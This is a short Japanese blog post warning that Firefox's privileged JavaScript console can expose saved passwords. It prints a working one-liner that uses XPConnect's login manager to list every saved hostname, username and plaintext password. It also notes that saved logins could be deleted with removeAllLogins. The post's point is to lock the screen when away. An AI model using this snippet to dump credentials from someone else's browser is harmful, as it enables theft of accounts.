JavaScriptコンソールからパスワードぶっこ抜き - hogehoge JavaScriptコンソールの上部の入力欄はChrome特権のコードも実行できるんで、XPConnectからゴニョゴニョっとやると平文パスワードを覗くことができちゃうんだね。 PCから離れるときは画面ロックをしないと危険ということかな。 ホントだ怖い。 具体的なコードは Cc["@mozilla.org/login-manager;1"].getService(Ci.nsILoginManager).getAllLogins({}).forEach(function(li){ console.log(li.hostname + ":" + li.username + "," + li.password) }); ※あっ書いちゃった... 離席中に覗かれるのも怖いけど、removeAllLogins実行されるのも
![Big Sky :: 怖い「JavaScriptコンソールからパスワードぶっこ抜き」](https://cdn-ak-scissors.b.st-hatena.com/image/square/ae5f360d3c82cd87e23b34fb6f5013ab7cf0f1a6/height=288;version=1;width=512/https%3A%2F%2Fmattn.kaoriya.net%2Fimages%2Flogo.png)